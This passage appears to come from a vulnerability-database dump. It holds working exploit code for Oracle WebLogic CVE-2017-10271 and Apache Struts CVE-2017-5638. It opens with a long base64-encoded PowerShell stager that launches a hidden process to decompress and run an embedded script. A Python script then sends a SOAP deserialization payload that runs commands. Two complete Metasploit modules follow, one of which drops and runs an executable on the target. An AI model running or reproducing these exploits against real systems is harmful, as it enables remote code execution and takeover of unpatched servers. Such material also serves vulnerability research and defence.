aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAJwBIADQAcwBJAEEARABQAFcAeAAxAHcAQwBBADcAVgBXAGIAVwAvAGEAUwBCAEQAKwBuAEUAagA5AEQAMQBhAEYAWgBGAHMAaABHAEIATABhAE4ASgBFAHEAMwBaAHAAWABVADUAeQBZAE8AQgBBAEkAaAAwADQAYgBlADIAMgBXAHIATAAzAEUAWABoAE8AZwAxAC8AOQArAHMAMgBDAG4ANgBUAFcAdAAyAHAAUABPADQAbQBWAGYAWgBtAFoAbgBuAG4AbABtADEAawBFAFcAZQA0AEwAeQBXAEYAawBzAHUAZgBMADUAegBlAEcAQgBnAHgATQBjAEsAVgBvAHAAYQBrADMASwBTAG0AbgBWAGEANQArAG0AKwBzAEUAQgBiAEoAUgBXAFYAawBmADUAcQBHAGgAVAB0AEYAdwAyAGUAWQBSAHAAUABMAHUANABhAEcAUgBKAFEAbQBLAHgAbgAxAGMANgBSAEsAQQAwAEoAZABFADkAbwB5AFQAVgBkAE8AVgB2ADUAWABaAE8ARQBuAEoAOABkAGIAOABnAG4AbABBACsASwA2AFcALwBLAGgAMwBHADcAegBIAEwAeABUAFkATgA3AE0AMgBKAGMAbwB4AGkAWAArADcAMQB1AFkAZQBsAE0AeABWADMAeQBhAGoAUQAxAEQALwAvAFYAUABYAHAAYwBXADEAVwBhAFQAMQBtAG0ASwBXAGEANgBtADUAUwBRAGEASwBLAHoANQBpAHEASwAxADkAMABlAGUARABOAFoAawBrADAAMQBhAFoAZQB3AGwATQBlAGkATQBvAHQAagBVADkAUABLAHMATQA0AHgAUQBHADUAQgBHAHMAcgBZAGgATQB4ADUAMwA2AHEANgBoAEEARQBmAEIASQBpAHMAaQBSAFcAWgBEAGgAUwBmADcAKwByAHEAVABCADAARQB1ADQAaAAzADAAOQBJAG0AcQBwAGwAWgBTAG8AdABUADIAZQB6AFAANwBSAHAAZgB1AHgAMQBGAGcAcwBhAGsAWQBvAFYAQwA1AEwAdwBwAFUAdQBTAEYAZgBWAEkAVwB1AG4AaQAyAEcAZgBrAG0AZwBRAHoAMABIAEoARgBRAHUATgB3AHAAdQBzAGcAdAB1AEkAUABSAEMAdgBGAEcAVwBOAGwANQBYAGYATQBhAEoAZgBrAHEAUQBEAHQAVgA1AFcAMABsADAAbwBnADUAWQBoAEUATAAwAE0AZQB2AHcALwBUADUAbgA3AEcAeQBGADUAUgBmAGMAVgBQAG0AWABvAGQAbgB1AGYAMABBADMAQgBmADMAaAB5ACsATwBRAHcASwByAHAARAB6AGwAMQBTAEIAMABjAEYAMABOAHkAYgBnAG0AKwBiAHcAbABPADYAawBQAGkAcgBWAHMAbQBMAEQATQBWAGoAdwBaAEEAUABUADAAawAyAFMARQBYADMAMgBqAEsAeABTAFMAcwBmAE4AKwAvAEsAUAA5AFcAdQBGAE0ASQBnAFMAdgB3ADgAcgAwAHgARwBuAC8AZwB3ADAAOABtAFMAVwA4AEwAZwBwAGwAMwAvAE0AeQBTAFkASgBhAEUAeQBhAG0AeABoAEgAMQBDAHQAbwBwADcAMgBHAE0AQQBrAFkAMgBjAFYAWABLAGMAUQB1AHcAUwBWAE4AegBUAGUASQAzAHkAUwBNAGgARgBoAEkAMABHAFMAaQB2ADEATgByAFIAVgBRADgANgA1AG8AWgBaAFQANQBKAGsAQQBkAFoAUwBzAEUAcgBTAEsARAArAHIAVABQADcAUABHAGkAcQBGAGQAcwBrAEEAbwBUADIAYwAyAEIAZQBLAFEAQwB5AGsAMABJADYASgAvAGkAbQBPAEYAMwBPAFEAVQBoAHQATQBKAHkAbQBaAGMAWABKAG8ATgBxADgAcwB1AEkAUwB6AEkAaABmAFYAbABDAGMAMABuAHcATABaAFkATAB2AGgAdQBwAFgAZAArADIATQBDAGUAcgBoAFYAQgBUAG0AWgBuAG8ATwBZADMANQBjAGcAOABlAHAAUwBEAEkAUABjAGcAYQBoADMANwBoAEwANABsAEgATQBKAEIASgBsAHAAVQB0ADkAWQBtADUAYwBHAGgAYgBIAHEAcQAvAGkAMABNAEMATQBRAFEAMgBBAHAAUgBYAGsAQQBWAFoAawAvAEsANgBRAFQARQBqAEEAdwAxADMAVwA5AFkAcABMAGgAQgBVAHQARwBZAGwAQQBaAGwAZgAxAGIAWQBaAEQAcQBQAEcAYwA2AFQAdgBxADQASgBEADQANgByADgAYwBMAEoAaQA4AHAANgAxAEUAbwBvAEQAZwBoAFgAdQBRAFgAcABkAHgAVQBWAFoARwBOAEIASABRAE8AeQBTAHEAdwBLAEQALwBkAHYAaQBMAHAAaQBIAGQAYQBDAFEAawBUADQATgBXAFYATQBiAFUAMwBBAGoASgA2AE4ASwBXAGUAcQAyADEASgBHAFMATwB5AGcANgBEAFIARQBEADgANwBZAFIASABKAGsANwBKACsALwBxACsAUQAyAGgAdgBqAFMAdgBhAFEAUABCAE0AcgBKAGoAWgBuAHYAbABBAGEAKwBpAEoAMQBpAHcAYgB2AGsATgA2AGEAdgBIAG0AbQBmACsAcAB0ACsAZwBhAFMAWABNADkARAA1AEMAVgBXAG4AYgBYAGEAUQA2ADYAMwBmAHEAcQA1ADQANwBxAHcAbQAxAFoANABwAE4AagBDAGIAcwAxAFgAaQB4AGMAMQBMADAAZQBUAHMAUwBkAGgAYgBvADMAdABQAG8AdwBxAFcAKwBYAFAAYgBwADEAKwA4AGkAZgByAEkAMwAzAFcAMwBQADcAVgBEAFgAWAAyADAAWABvAEIANQBOAG0ARQBJAFIAbgBnAFgAdABkAGUAOQBlAG0ALwBkAHYARwB3AEsAeQBlADQASAA2AHoAbABmAFYAdgB6AFMAZQB6AFcAawA5AGIAOQBLAGsANwBvAE0AUABCAFEANgA4AHQANwBpAGMAagBoAG8AZQBCAEUAWQA1AHIANQA1AGkAdQArADgAbABpAFYATwBQADIAMQBrAEsAbwBNAHoALwAxAHQAcgAxAGcAMQBKAG4AYgAvAG0AYgBTAHAAVwBSAGgAVgBQAHQAMABnAEEAWQBJAGYAZgBLAHUAaAA4AE4ATwB1AEEAdwA3AEsAVABMAE8AUgA0ACsATgBLAEcAeQBPAEgAVwBlAEIAawBZAFYAYQBvADAAMwB2AEgAVABNAEgAdwA3AGEASgBoAGkAMQB6AGcASwArADQAYwAzAHIAVQBOAEcAcAAzAC8AbQBPAHIAZgBUAGYARwB2AFkAagA1AG4AYQA1AFIAbQA0AHkAUgBqAHgATABqAEoAcAB6AFgAegBxADcAbQBzAGMAUQBKAGgAKwBhAGoASwBXAFYAUQAvADIANwBUAE4AawBEAEcAcQBhAE4AdQAvAFkAUgB1ADcAeAA0AEgAbgBSAEMAMQBRAEcAWQBVAGMAWQBUAGIAOQBHAEYANABOAEEAYQBiAGwAegBlAGcAYwB6AHUAcwArAFIAeQBKADIAQgBvAGIAeABpAGcAMABRAGgAUwA0ADgAdwBsAEcASgBrAGkAYgBqADYAaAB0ADgAcwBiAG0AZwAyAE0ANwB4AG0AaAAwAE0AcQAvAGQAUAA5AFQAbQA0AEQATQBaAHIAegA3AFkAUABYAFQAVQA5AGgAegBEAE0ASQA2AGkAZQAvAGcAMQBrAEcAYwB2ADEALwBIAFkAZgBEAHAAYgBQAFEAbgBjAHUAdwBYAGIATgA4AGIANQA4AE8ATgBiAHkAUgBFAGcAUwBTAGsAeQBhADgAMABYAHUAZgA5AFIAeQA3AFoAeABrAHMANAB4AEEAMAA1AEEATQB5ADcASwBzAE0AMgBUAGQAdAA1AGUASABVADYAbABoAHEAYgBKAEsALwBtAEIASgBEAEYAaABjAEsAUABCAG4AVgBlAFEARwBUAEgARwBQAGQAbgBjAG8AUQAvAEQAdABiAEoAdgA5AHYATAB1AEcAYwBMAHcAOQBPAFQAVgBrAGEANAA4AEMAKwBwAGYAZQAzADYAeABkAEgARgB4AEIAeQA1AEMAZABlAHoANABXACsAbQBUAE8AQgBUAHoAYwBuAFYAOQBXAHEAMQBDAEQANgArAHUANgAxAFcASQA4AGQAZgBqAGEAdgBEAGwAUgB0AHYAYgBLAHMAdABMAFkASQBmAE0AcwAzAFcAMgBzADYANwBMAHUAaQBrAHQAKwA2AFAALwBGAGIARwA4AFYAdQBmAHcANQAvADgAYwBzAGEAOQByAFAAOQBuADkASgBSAFMAcgA1AFgAMgA4ADMAeQAxAC8AdQAvAEIAYgBpAFAANQB1ADMATABlAFkAQwBoAEIAMABvAGQARQB3AHMAcgAvAG4AWABnAHMALwA1ADgAYQBMAGwAdwBCAEkAQwBPAFEAOQB5AEIALwA1AEMAbgBlAFYAaQBlAE4ATABlAEQAVgA0AGMALwBnAFAAeQBrAHYAWgBDAGkAdwBLAEEAQQBBAD0AJwAnACkAKQApACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQAnADsAJABzAC4AVQBzAGUAUwBoAGUAbABsAEUAeABlAGMAdQB0AGUAPQAkAGYAYQBsAHMAZQA7ACQAcwAuAFIAZQBkAGkAcgBlAGMAdABTAHQAYQBuAGQAYQByAGQATwB1AHQAcAB1AHQAPQAkAHQAcgB1AGUAOwAkAHMALgBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAPQAnAEgAaQBkAGQAZQBuACcAOwAkAHMALgBDAHIAZQBhAHQAZQBOAG8AVwBpAG4AZABvAHcAPQAkAHQAcgB1AGUAOwAkAHAAPQBbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBTAHQAYQByAHQAKAAkAHMAKQA7AA==\"\n\nurl = sys.argv[1]\n\nrequest_headers = {\"Accept-Encoding\": \"gzip, deflate\", \"Accept\": \"*/*\", \"Accept-Language\": \"en\", \"User-Agent\": \"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)\", \"Connection\": \"close\", \"Content-Type\": \"text/xml\"}\ndata=\"<soapenv:Envelope xmlns:soapenv=\\\"http://schemas.xmlsoap.org/soap/envelope/\\\" xmlns:wsa=\\\"http://www.w3.org/2005/08/addressing\\\" xmlns:asy=\\\"http://www.bea.com/async/AsyncResponseService\\\">\\r\\n <soapenv:Header>\\r\\n <wsa:Action>xx</wsa:Action>\\r\\n <wsa:RelatesTo>xx</wsa:RelatesTo>\\r\\n <work:WorkContext xmlns:work=\\\"http://bea.com/2004/06/soap/workarea/\\\">\\r\\n <void class=\\\"java.lang.ProcessBuilder\\\">\\r\\n <array class=\\\"java.lang.String\\\" length=\\\"3\\\">\\r\\n <void index=\\\"0\\\">\\r\\n <string>cmd</string>\\r\\n </void>\\r\\n <void index=\\\"1\\\">\\r\\n <string>/c</string>\\r\\n </void>\\r\\n <void index=\\\"2\\\">\\r\\n <string>%s</string>\\r\\n </void>\\r\\n </array>\\r\\n <void method=\\\"start\\\"/></void>\\r\\n </work:WorkContext>\\r\\n </soapenv:Header>\\r\\n <soapenv:Body>\\r\\n <asy:onAsyncDelivery/>\\r\\n </soapenv:Body>\\r\\n</soapenv:Envelope>\" % (exploit)\nresponse = requests.post(url, headers=request_headers, data=data)\nprint \"status_code:%s\" % str(response.status_code)\nprint(response)", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2018-01-29T00:20:57", "description": "", "cvss3": {}, "published": "2018-01-28T00:00:00", "type": "packetstorm", "title": "Oracle WebLogic wls-wsat Component Deserialization Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-10271"], "modified": "2018-01-28T00:00:00", "id": "PACKETSTORM:146143", "href": "https://packetstormsecurity.com/files/146143/Oracle-WebLogic-wls-wsat-Component-Deserialization-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n# include Msf::Exploit::Remote::HttpServer \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Oracle WebLogic wls-wsat Component Deserialization RCE', \n'Description' => %q( \nThe Oracle WebLogic WLS WSAT Component is vulnerable to a XML Deserialization \nremote code execution vulnerability. Supported versions that are affected are \n10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Discovered by Alexey Tyurin \nof ERPScan and Federico Dotta of Media Service. Please note that SRVHOST, SRVPORT, \nHTTP_DELAY, URIPATH and related HTTP Server variables are only used when executing a check \nand will not be used when executing the exploit itself. \n), \n'License' => MSF_LICENSE, \n'Author' => [ \n'Kevin Kirsche <d3c3pt10n[AT]deceiveyour.team>', # Metasploit module \n'Luffin', # Proof of Concept \n'Alexey Tyurin', 'Federico Dotta' # Vulnerability Discovery \n], \n'References' => \n[ \n['URL', 'https://www.oracle.com/technetwork/topics/security/cpuoct2017-3236626.html'], # Security Bulletin \n['URL', 'https://github.com/Luffin/CVE-2017-10271'], # Proof-of-Concept \n['URL', 'https://github.com/kkirsche/CVE-2017-10271'], # Standalone Exploit \n['CVE', '2017-10271'], \n['EDB', '43458'] \n], \n'Platform' => %w{ win unix }, \n'Arch' => [ ARCH_CMD ], \n'Targets' => \n[ \n[ 'Windows Command payload', { 'Arch' => ARCH_CMD, 'Platform' => 'win' } ], \n[ 'Unix Command payload', { 'Arch' => ARCH_CMD, 'Platform' => 'unix' } ] \n], \n'DisclosureDate' => \"Oct 19 2017\", \n# Note that this is by index, rather than name. It's generally easiest \n# just to put the default at the beginning of the list and skip this \n# entirely. \n'DefaultTarget' => 0 \n) \n) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'The base path to the WebLogic WSAT endpoint', '/wls-wsat/CoordinatorPortType']), \nOptPort.new('RPORT', [true, \"The remote port that the WebLogic WSAT endpoint listens on\", 7001]), \nOptFloat.new('TIMEOUT', [true, \"The timeout value of requests to RHOST\", 20.0]), \n# OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the check payload', 10]) \n]) \nend \n \ndef cmd_base \nif target['Platform'] == 'win' \nreturn 'cmd' \nelse \nreturn '/bin/sh' \nend \nend \n \ndef cmd_opt \nif target['Platform'] == 'win' \nreturn '/c' \nelse \nreturn '-c' \nend \nend \n \n \n# \n# This generates a XML payload that will execute the desired payload on the RHOST \n# \ndef exploit_process_builder_payload \n# Generate a payload which will execute on a *nix machine using /bin/sh \nxml = %Q{<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n<soapenv:Header> \n<work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"> \n<java> \n<void class=\"java.lang.ProcessBuilder\"> \n<array class=\"java.lang.String\" length=\"3\" > \n<void index=\"0\"> \n<string>#{cmd_base}</string> \n</void> \n<void index=\"1\"> \n<string>#{cmd_opt}</string> \n</void> \n<void index=\"2\"> \n<string>#{payload.encoded.encode(xml: :text)}</string> \n</void> \n</array> \n<void method=\"start\"/> \n</void> \n</java> \n</work:WorkContext> \n</soapenv:Header> \n<soapenv:Body/> \n</soapenv:Envelope>} \nend \n \n# \n# This builds a XML payload that will generate a HTTP GET request to our SRVHOST \n# from the target machine. \n# \ndef check_process_builder_payload \nxml = %Q{<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n<soapenv:Header> \n<work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"> \n<java version=\"1.8\" class=\"java.beans.XMLDecoder\"> \n<void id=\"url\" class=\"java.net.URL\"> \n<string>#{get_uri.encode(xml: :text)}</string> \n</void> \n<void idref=\"url\"> \n<void id=\"stream\" method = \"openStream\" /> \n</void> \n</java> \n</work:WorkContext> \n</soapenv:Header> \n<soapenv:Body/> \n</soapenv:Envelope>} \nend \n \n# \n# In the event that a 'check' host responds, we should respond randomly so that we don't clog up \n# the logs too much with a no response error or similar. \n# \ndef on_request_uri(cli, request) \nrandom_content = '<html><head></head><body><p>'+Rex::Text.rand_text_alphanumeric(20)+'<p></body></html>' \nsend_response(cli, random_content) \n \n@received_request = true \nend \n \n# \n# The exploit method connects to the remote service and sends a randomly generated string \n# encapsulated within a SOAP XML body. This will start an HTTP server for us to receive \n# the response from. This is based off of the exploit technique from \n# exploits/windows/novell/netiq_pum_eval.rb \n# \n# This doesn't work as is because MSF cannot mix HttpServer and HttpClient \n# at the time of authoring this \n# \n# def check \n# start_service \n# \n# print_status('Sending the check payload...') \n# res = send_request_cgi({ \n# 'method' => 'POST', \n# 'uri' => normalize_uri(target_uri.path), \n# 'data' => check_process_builder_payload, \n# 'ctype' => 'text/xml;charset=UTF-8' \n# }, datastore['TIMEOUT']) \n# \n# print_status(\"Waiting #{datastore['HTTP_DELAY']} seconds to see if the target requests our URI...\") \n# \n# waited = 0 \n# until @received_request \n# sleep 1 \n# waited += 1 \n# if waited > datastore['HTTP_DELAY'] \n# stop_service \n# return Exploit::CheckCode::Safe \n# end \n# end \n# \n# stop_service \n# return Exploit::CheckCode::Vulnerable \n# end \n \n# \n# The exploit method connects to the remote service and sends the specified payload \n# encapsulated within a SOAP XML body. \n# \ndef exploit \nsend_request_cgi({ \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path), \n'data' => exploit_process_builder_payload, \n'ctype' => 'text/xml;charset=UTF-8' \n}, datastore['TIMEOUT']) \nend \nend \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/146143/oracle_weblogic_wsat_deserialization_rce.rb.txt"}, {"lastseen": "2017-03-15T01:15:35", "description": "", "cvss3": {}, "published": "2017-03-14T00:00:00", "type": "packetstorm", "title": "Apache Struts Jakarta Multipart Parser OGNL Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-14T00:00:00", "id": "PACKETSTORM:141630", "href": "https://packetstormsecurity.com/files/141630/Apache-Struts-Jakarta-Multipart-Parser-OGNL-Injection.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::EXE \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Apache Struts Jakarta Multipart Parser OGNL Injection', \n'Description' => %q{ \nThis module exploits a remote code execution vunlerability in Apache Struts \nversion 2.3.5 - 2.3.31, and 2.5 - 2.5.10. Remote Code Execution can be performed \nvia http Content-Type header. \n \nNative payloads will be converted to executables and dropped in the \nserver's temp dir. If this fails, try a cmd/* payload, which won't \nhave to write to the disk. \n}, \n'Author' => [ \n'Nike.Zheng', # PoC \n'Nixawk', # Metasploit module \n'Chorder', # Metasploit module \n'egypt', # combining the above \n'Jeffrey Martin', # Java fu \n], \n'References' => [ \n['CVE', '2017-5638'], \n['URL', 'https://cwiki.apache.org/confluence/display/WW/S2-045'] \n], \n'Privileged' => true, \n'Targets' => [ \n[ \n'Universal', { \n'Platform' => %w{ unix windows linux }, \n'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ], \n}, \n], \n], \n'DisclosureDate' => 'Mar 07 2017', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOpt::RPORT(8080), \nOptString.new('TARGETURI', [ true, 'The path to a struts application action', '/struts2-showcase/' ]), \n] \n) \nregister_advanced_options( \n[ \nOptString.new('HTTPMethod', [ true, 'The HTTP method to send in the request. Cannot contain spaces', 'GET' ]) \n] \n) \n \n@data_header = \"X-#{rand_text_alpha(4)}\" \nend \n \ndef check \nvar_a = rand_text_alpha_lower(4) \n \nognl = \"\" \nognl << %q|(#os=@java.lang.System@getProperty('os.name')).| \nognl << %q|(#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('|+var_a+%q|', #os))| \n \nbegin \nresp = send_struts_request(ognl) \nrescue Msf::Exploit::Failed \nreturn Exploit::CheckCode::Unknown \nend \n \nif resp && resp.code == 200 && resp.headers[var_a] \nvprint_good(\"Victim operating system: #{resp.headers[var_a]}\") \nExploit::CheckCode::Vulnerable \nelse \nExploit::CheckCode::Safe \nend \nend \n \ndef exploit \ncase payload.arch.first \n#when ARCH_JAVA \n# datastore['LHOST'] = nil \n# resp = send_payload(payload.encoded_jar) \nwhen ARCH_CMD \nresp = execute_command(payload.encoded) \nelse \nresp = send_payload(generate_payload_exe) \nend \n \nrequire'pp' \npp resp.headers if resp \nend \n \ndef send_struts_request(ognl, extra_header: '') \nuri = normalize_uri(datastore[\"TARGETURI\"]) \ncontent_type = \"%{(#_='multipart/form-data').\" \ncontent_type << \"(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).\" \ncontent_type << \"(#_memberAccess?\" \ncontent_type << \"(#_memberAccess=#dm):\" \ncontent_type << \"((#container=#context['com.opensymphony.xwork2.ActionContext.container']).\" \ncontent_type << \"(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).\" \ncontent_type << \"(#ognlUtil.getExcludedPackageNames().clear()).\" \ncontent_type << \"(#ognlUtil.getExcludedClasses().clear()).\" \ncontent_type << \"(#context.setMemberAccess(#dm)))).\" \ncontent_type << ognl \ncontent_type << \"}\" \n \nheaders = { 'Content-Type' => content_type } \nif extra_header \nheaders[@data_header] = extra_header \nend \n \n#puts content_type.gsub(\").\", \").\\n\") \n#puts \n \nresp = send_request_cgi( \n'uri' => uri, \n'method' => datastore['HTTPMethod'], \n'headers' => headers \n) \n \nif resp && resp.code == 404 \nfail_with(Failure::BadConfig, 'Server returned HTTP 404, please double check TARGETURI') \nend \nresp \nend \n \ndef execute_command(cmd) \nognl = '' \nognl << %Q|(#cmd=@org.apache.struts2.ServletActionContext@getRequest().getHeader('#{@data_header}')).| \n \n# You can add headers to the server's response for debugging with this: \n#ognl << %q|(#r=#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse']).| \n#ognl << %q|(#r.addHeader('decoded',#cmd)).| \n \nognl << %q|(#os=@java.lang.System@getProperty('os.name')).| \nognl << %q|(#cmds=(#os.toLowerCase().contains('win')?{'cmd.exe','/c',#cmd}:{'/bin/sh','-c',#cmd})).| \nognl << %q|(#p=new java.lang.ProcessBuilder(#cmds)).| \nognl << %q|(#p.redirectErrorStream(true)).| \nognl << %q|(#process=#p.start())| \n \nsend_struts_request(ognl, extra_header: cmd) \nend \n \ndef send_payload(exe) \n \nognl = \"\" \nognl << %Q|(#data=@org.apache.struts2.ServletActionContext@getRequest().getHeader('#{@data_header}')).| \nognl << %Q|(#f=@java.io.File@createTempFile('#{rand_text_alpha(4)}','.exe')).| \n#ognl << %q|(#r=#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse']).| \n#ognl << %q|(#r.addHeader('file',#f.getAbsolutePath())).| \nognl << %q|(#f.setExecutable(true)).| \nognl << %q|(#f.deleteOnExit()).| \nognl << %q|(#fos=new java.io.FileOutputStream(#f)).| \n \n# Using stuff from the sun.* package here means it likely won't work on \n# non-Oracle JVMs, but the b64 decoder in Apache Commons doesn't seem to \n# work and I don't see a better way of getting binary data onto the \n# system. =/ \nognl << %q|(#d=new sun.misc.BASE64Decoder().decodeBuffer(#data)).| \nognl << %q|(#fos.write(#d)).| \nognl << %q|(#fos.close()).| \n \nognl << %q|(#p=new java.lang.ProcessBuilder({#f.getAbsolutePath()})).| \nognl << %q|(#p.start()).| \nognl << %q|(#f.delete())| \n \nsend_struts_request(ognl, extra_header: [exe].pack(\"m\").delete(\"\\n\")) \nend \n \nend \n \n=begin \nDoesn't work: \n \nognl << %q|(#cl=new java.net.URLClassLoader(new java.net.URL[]{#f.toURI().toURL()})).| \nognl << %q|(#c=#cl.loadClass('metasploit.Payload')).| \nognl << %q|(#m=@ognl.OgnlRuntime@getMethods(#c,'main',true).get(0)).| \nognl << %q|(#r.addHeader('meth',#m.toGenericString())).| \nognl << %q|(#m.invoke(null,null)).| \n \n#ognl << %q|(#m=#c.getMethod('run',@java.lang.Class@forName('java.lang.Object'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0 \n#ognl << %q|(#m=#c.getMethod('run',@java.lang.Class@forName('java.lang.String'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0 \n#ognl << %q|(#m=#c.getMethod('run',@java.lang.Class@forName('[Ljava.lang.Object;'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0 \n#ognl << %q|(#m=#c.getMethod('run',@java.lang.Class@forName('[Ljava.lang.String;'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0 \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{})).| \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@java.lang.Class@forName('java.lang.Object')})).| \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@java.lang.Class@forName('java.lang.String')})).| \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@java.lang.Class@forName('java.lang.String')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@16e2d926 \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.Object;')})).| \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@684b3dfd \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{null})).| \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{@java.lang.Class@forName('java.lang.Object')})).| \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{@java.lang.Class@forName('java.lang.String')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@16e2d926 \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{@java.lang.Class@forName('[Ljava.lang.Object;')})).| \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{@java.lang.Class@forName('[Ljava.lang.String;')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@684b3dfd \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@4b232ba9 \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{null})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@4b232ba9 \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{null})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@4fee2899 \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[])).| # parse failed \n#ognl << %q|(#m=#c.getMethod('run',null)).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@50af0cd6 \n \n#ognl << %q|(#m=#c.getMethod('main',@java.lang.Class@forName('java.lang.Object'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0 \n#ognl << %q|(#m=#c.getMethod('main',@java.lang.Class@forName('java.lang.String'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0 \n#ognl << %q|(#m=#c.getMethod('main',@java.lang.Class@forName('[Ljava.lang.Object;'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0 \n#ognl << %q|(#m=#c.getMethod('main',@java.lang.Class@forName('[Ljava.lang.String;'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@2231d3a9 \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{})).| \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('java.lang.Object')})).| \n#ognl << 